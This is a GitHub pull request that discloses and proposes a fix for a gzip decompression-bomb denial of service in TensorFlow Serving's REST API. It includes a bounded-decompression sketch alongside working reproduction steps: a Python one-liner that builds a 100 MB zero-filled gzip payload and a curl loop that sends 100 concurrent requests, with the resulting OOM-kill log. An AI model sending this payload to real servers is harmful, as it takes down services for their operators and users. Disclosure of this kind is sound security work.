
Fix: HTTP Gzip Decompression Bomb DoS#4136

Open
theteatoast wants to merge 1 commit into tensorflow:master from theteatoast:master

Conversation


@theteatoast theteatoast commented Apr 17, 2026

Description:

A remote, unauthenticated attacker can crash any Serving instance by sending a small gzip-compressed HTTP request body (~100 KB) that decompresses into ~100 MB of heap memory. By sending a modest number of concurrent requests (~50-100), the attacker can force the server to allocate multiple gigabytes of heap, triggering an OOM kill. The server enforces no request body size limit, no decompression ratio guard, and no per-connection memory budget.

No authentication is required. This is the default configuration of any TensorFlow Serving deployment with --rest_api_port enabled.
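To illustrate what a missing decompression guard means in practice, here is a minimal sketch of a bounded gzip decompressor in Python (an illustration of the general technique, not TensorFlow Serving's actual code; the `MAX_DECOMPRESSED` value and the `safe_gunzip` helper are assumptions for this example). It caps the decompressed output so a bomb is rejected instead of expanded:

```python
import gzip
import zlib

# Illustrative cap; the right limit is deployment-specific.
MAX_DECOMPRESSED = 10 * 1024 * 1024  # 10 MiB

def safe_gunzip(data: bytes, limit: int = MAX_DECOMPRESSED) -> bytes:
    """Decompress a gzip body, refusing to produce more than `limit` bytes."""
    # 16 + MAX_WBITS tells zlib to expect gzip framing (header + trailer).
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    # max_length = limit + 1 detects overflow without buffering the whole bomb.
    out = d.decompress(data, limit + 1)
    if len(out) > limit:
        raise ValueError("decompression bomb: output exceeds limit")
    return out
```

A well-formed small body round-trips normally (`safe_gunzip(gzip.compress(b"hi"))` returns `b"hi"`), while a zero-filled bomb raises `ValueError` after producing at most `limit + 1` bytes.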

Steps to Reproduce:

  1. Start a TensorFlow Serving instance:
docker run -t --rm \
  -p 8501:8501 \
  -v ~/models/resnet:/models/resnet \
  -e MODEL_NAME=resnet \
  --memory=2g \
  --memory-swap=2g \
  tensorflow/serving

Note: the resnet model is used for the PoC.

--memory=2g --memory-swap=2g is set for a quick, reproducible PoC in a controlled environment. In a real-world deployment without memory constraints, the impact would be significantly worse: the server would sustain the full ~10 GB of concurrent allocation before the OOM kill.

  2. Generate the gzip payload (~100 KB compressed → 100 MB decompressed):
python3 -c "
import gzip, io, sys
buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=9) as f:
    f.write(b'\x00' * 100000000)
sys.stdout.buffer.write(buf.getvalue())
" > /tmp/bomb.gz
  3. Send 100 concurrent requests:
for i in $(seq 1 100); do
  curl -s -X POST http://localhost:8501/v1/models/resnet:predict \
    -H "Content-Type: application/json" \
    -H "Content-Encoding: gzip" \
    --data-binary @/tmp/bomb.gz &
done
wait
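The peak allocation implied by this loop is simple arithmetic, assuming all 100 request bodies are held decompressed in memory at once:

```python
# Back-of-envelope estimate for the loop above.
requests = 100
bytes_per_request = 100_000_000  # ~100 MB decompressed per body
total = requests * bytes_per_request
print(f"~{total / 1e9:.0f} GB peak allocation")  # ~10 GB, far beyond the 2 GB container limit
```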

Observed result:

Server process is killed mid-operation and exits immediately. All inference capacity is lost:

[evhttp_server.cc : 261] NET_LOG: Entering the event loop ...
/usr/bin/tf_serving_entrypoint.sh: line 3: 6 Killed tensorflow_model_server \
  --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} \
  --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME}

Impact:

  • No authentication required: default deployment is fully exposed
  • ~1000x amplification: ~100KB payload triggers 100MB allocation per request
  • Full service disruption: all served models become unavailable
  • Trivially repeatable: server restarts in the same vulnerable state; attacker can sustain permanent unavailability with minimal bandwidth (~10MB/s)
  • Affects all default deployments: no misconfiguration required

PS:

The report was previously submitted to Google VRP, but it was closed with the note that it primarily impacts service availability. Specifically, "ways to enable denial of service attacks are less of a concern for us." I also wasn't able to find a clear owner or contact, and there doesn't appear to be a security policy in the repository.
